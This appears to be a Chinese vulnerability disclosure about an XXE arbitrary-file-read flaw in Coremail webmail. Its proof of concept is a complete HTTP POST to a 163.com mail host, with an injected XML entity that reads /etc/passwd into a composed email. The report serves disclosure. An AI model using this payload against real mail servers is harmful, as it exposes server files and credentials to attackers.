coremail任意文件读取漏洞

### 简要描述： coremail在实现上存在缺陷，利用80sec发布的xml解析漏洞可以读取服务器上任意文件，包括服务器配置文件和敏感的数据库文件，结合上下文逻辑可能可以获得更高权限，影响所有使用coremail的用户 ### 详细说明： coremail服务在接受和传递参数时使用的是xml的格式进行数据传递，但是根据80sec的安全公告，如果服务端在处理xml数据时格式不对就会导致安全漏洞，使用应用上下文的权限来获取任意文件内容，结合逻辑可能可以得到更多的权限 ### 漏洞证明： 神奇的代码哦，就是简单的在xml头部附加我们的恶意就可以了 ``` POST /js4/s?sid=jAZNlaKzhPcBsFgYIazzsbDOwpsMYtTh&func=mbox:compose&l=compose&action=deliver HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: text/javascript Referer: http://twebmail.mail.163.com/js4/index.jsp?sid=jAZNlaKzhPcBsFgYIazzsbDOwpsMYtTh Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET4.0C; .NET4.0E) Host: twebmail.mail.163.com Content-Length: 1348 Connection: Keep-Alive Cache-Control: no-cache Cookie: it's a secert var=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+copyright+%5B%3C%21ENTITY+hi80sec+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cobject%3E%3Cstring+name%3D%22id%22%3Ec%3A1320845207002%3C%2Fstring%3E%3Cobject+name%3D%22attrs%22%3E%3Cstring+name%3D%22account%22%3E%22Hi%22%26lt%3Bfukhaha%40163.com%26gt%3B%3C%2Fstring%3E%3Cboolean+name%3D%22showOneRcpt%22%3Efalse%3C%2Fboolean%3E%3Carray+name%3D%22to%22%3E%3Cstring%3E%22fukhaha%40163.com%22%26lt%3Bfukhaha%40163.com%26gt%3B%3C%2Fstring%3E%3C%2Farray%3E%3Carray+name%3D%22cc%22%2F%3E%3Carray+name%3D%22bcc%22%2F%3E%3Cstring+name%3D%22subject%22%3Eshow+me+the+%2Fetc%2Fpasswd%3C%2Fstring%3E%3Cboolean+name%3D%22isHtml%22%3Etrue%3C%2Fboolean%3E%3Cstring+name%3D%22content%22%3E%26lt%3Bdiv+style%3D%27line-height%3A1.7%3Bcolor%3A%23000000%3Bfont-size%3A14px%3Bfont-family%3Aarial%27%26gt%3B%26lt%3BDIV%26gt%3B%26hi80sec%3B%26lt%3B%2FDIV%26gt%3B%26lt%3B%2Fdiv%26gt%3B%3C%2Fstring%3E%3Cint+name%3D%22priority%22%3E3%3C%2Fint%3E%3Cboolean+name%3D%22saveSentCopy%22%3Etrue%3C%2Fboolean%3E%3Cboolean+name%3D%22requestReadReceipt%22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22charset%22%3EGBK%3C%2Fstring%3E%3C%2Fobject%3E%3Cboolean+name%3D%22returnInfo%22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22action%22%3Edeliver%3C%2Fstring%3E%3Cint+name%3D%22saveSentLimit%22%3E1%3C%2Fint%3E%3C%2Fobject%3E ``` [<img src="https://images.seebug.org/upload/201111/092144496d52fe19162c25b2a41ff6623af369be.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201111/092144496d52fe19162c25b2a41ff6623af369be.jpg)